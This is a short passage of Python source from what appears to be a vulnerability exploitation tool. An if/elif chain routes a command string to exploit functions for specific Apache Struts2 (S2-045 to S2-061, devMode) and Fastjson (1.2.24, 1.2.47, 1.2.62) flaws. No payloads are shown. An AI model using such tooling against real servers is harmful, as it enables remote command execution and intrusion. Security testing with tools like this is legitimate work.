                exp_apache_struts2.s2_045_exp(cmd)
            elif vul_num == "S2-046" or vul_num == "s2-046":
                exp_apache_struts2.s2_046_exp(cmd)
            elif vul_num == "S2-048" or vul_num == "s2-048":
                exp_apache_struts2.s2_048_exp(cmd)
            elif vul_num == "S2-052" or vul_num == "s2-052":
                exp_apache_struts2.s2_052_exp(cmd)
            elif vul_num == "S2-057" or vul_num == "s2-057":
                exp_apache_struts2.s2_057_exp(cmd)
            elif vul_num == "S2-059" or vul_num == "s2-059":
                exp_apache_struts2.s2_059_exp(cmd)
            elif vul_num == "S2-061" or vul_num == "s2-061":
                exp_apache_struts2.s2_061_exp(cmd)
            elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
                exp_apache_struts2.s2_devMode_exp(cmd)

            elif vul_num == "1.2.24":
                print(rmi_ldap)
                exp_fastjson.fastjson_1224_exp(cmd)
            elif vul_num == "1.2.47":
                print(rmi_ldap)
                exp_fastjson.fastjson_1247_exp(cmd)
            elif vul_num == "1.2.62":
                print(rmi_ldap)
                exp_fastjson.fastjson_1262_exp(cmd)
            else:
                pass